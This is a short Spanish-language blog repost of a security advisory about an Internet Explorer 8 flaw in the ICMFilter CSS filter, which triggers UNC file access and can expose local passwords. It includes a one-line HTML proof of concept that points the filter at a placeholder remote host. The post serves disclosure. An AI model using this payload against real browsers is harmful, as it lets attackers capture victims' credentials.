Internet Explorer 8 es vulnerable a ataques de lectura arbitraria de archivo mediante UNC, con las consecuencias usuales (divulgación de contraseñas locales, etc.) como en IE6 antes de SP1. Es en el ICMFilter, el cual es accesible mediante la propiedad de filtrado CSS. Código de ejemplo de la explotación:

<div
style="-ms-filter:&quot;progid:DXImageTransform.Microsoft.ICMFilter(colorSpace=
'\\\\example.com\\test') &quot;">ICMFilter</div>

IE intenta contactar al servidor remoto cuando el elemento se muestra en pantalla al avanzar o retroceder. La consecuencia de esto es discutida en el contexto de vulnerabilidades previas en:

http://archives.neohapsis.com/archives/win2ksecadvice/2000-q1/0201.html

No he verificado el parser de archivo ICM en busca de mayores consecuencias, pero pienso que el riesgo de divulgación de contraseñas locales débiles es suficiente para justificar la preocupación.

Contacté a Microsoft y alguien llamado Tony me informó que eso es un bug y no una vulnerabilidad de seguridad, los que sea que ello signifique.

Via: Segu-Info

Por admin

Deja una respuesta

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.

Powered By
100% Free SEO Tools - Tool Kits PRO